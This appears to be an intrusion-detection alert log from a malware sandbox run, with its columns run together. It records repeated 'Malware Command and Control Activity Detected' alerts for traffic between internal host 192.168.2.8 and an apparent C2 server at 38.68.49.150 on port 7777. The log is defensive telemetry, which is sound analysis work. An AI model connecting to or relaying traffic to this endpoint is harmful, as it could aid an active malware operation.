                2025-03-16T01:40:33.140365+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:33.291018+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:33.519976+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:33.786057+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:33.900290+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.009560+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.118952+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.228725+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.337786+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.447382+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.556802+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.665955+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.775243+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.888495+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.009828+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.043505+010028529231Malware Command and Control Activity Detected192.168.2.84968438.68.49.1507777TCP
                2025-03-16T01:40:35.119229+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.228506+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.338098+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.447917+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.556628+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.666138+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.775275+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.889641+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.995537+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:36.105247+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:36.213647+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:36.322237+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:36.472394+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:36.619938+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:36.728619+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:36.862502+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:36.947237+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.056767+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.166565+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.275337+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.386500+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.494112+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.603530+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.712802+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.825710+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.931535+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.041202+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.150555+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.259690+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.369154+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.506501+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.587842+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.728883+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.837889+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.947146+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.056462+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.166013+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.275600+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.384663+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.494057+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.618605+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.712884+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.822477+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.931621+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.041020+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.150465+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.260567+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.369093+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.478745+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.587759+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.699797+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.806515+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.918886+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.025411+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.134684+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.258508+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.353548+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.462803+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.572323+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.681562+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.791015+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.900384+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:42.009920+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:42.121887+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:42.228699+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:42.529165+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:42.696608+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:42.806685+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:42.916015+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.025319+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.134570+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.243948+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.353486+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.462737+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.572281+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.681541+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.791024+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.903417+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.009847+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.119350+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.228399+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.337843+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.449264+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.556571+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.666203+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.775260+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.887501+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.009884+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.129161+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.329258+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.452618+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.556768+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.665947+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.775587+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.884864+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.994115+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.103549+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.221475+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.337784+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.447476+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.556652+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.665982+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.778348+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.884699+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.994187+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.103872+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.213018+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.322278+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.431544+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.540971+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.650569+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.759900+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.876108+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.979504+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.089819+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.197411+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.306850+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.416053+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.528325+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.635038+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.744342+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.866459+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.962850+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.073920+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.208799+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.322189+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.431526+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.561526+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.629510+010028529231Malware Command and Control Activity Detected192.168.2.84968438.68.49.1507777TCP
                2025-03-16T01:40:49.666221+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.775447+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.885130+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.994161+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.103501+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.212919+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.346469+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.431608+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.548872+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.650369+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.759863+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.869083+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.978618+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.088097+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.197215+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.306799+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.400243+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.494071+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.591118+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.681595+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.790955+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.884829+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.978607+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.072422+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.165999+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.259733+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.353728+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.447285+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.541745+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.634842+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.728624+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.823961+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.915912+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.010067+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.103503+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.197188+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.294615+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.384821+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.478528+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.572420+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.669779+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.760407+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.885849+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:53.979951+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:54.072958+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:54.165849+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:54.259840+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:54.353534+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:54.447250+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:54.540910+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:54.634812+010028529231Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-16T01:40:27.135291+010028528741Malware Command and Control Activity Detected38.68.49.1507777192.168.2.849684TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-16T01:40:13.947183+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:14.056980+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:14.166187+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:14.275279+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:14.384661+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:14.507077+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:14.618978+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:14.754079+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:14.869292+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:15.197563+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:15.306616+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:15.415958+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:15.525200+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:15.634719+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:15.744341+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:15.853578+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:15.962753+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:16.098477+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:16.186847+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:16.306603+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:16.415975+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:16.556674+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:16.665935+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:16.775451+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:16.889673+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.009783+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.119262+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.228683+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.350441+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.447155+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.557756+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.667192+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.794284+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:17.922896+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:18.041189+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:18.154450+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:18.277537+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:18.486605+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:18.713563+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:18.822458+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:18.931704+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.040975+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.172001+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.307002+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.431846+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.541025+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.650312+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.759694+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.869357+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:19.978527+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:20.087713+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:20.197259+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:20.326486+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:20.415956+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:20.778281+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:20.895722+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:21.052790+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:21.248492+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:21.373981+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:21.479547+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:21.587813+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:21.697317+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:21.806528+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:21.915924+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.030093+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.134684+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.244798+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.353571+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.462834+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
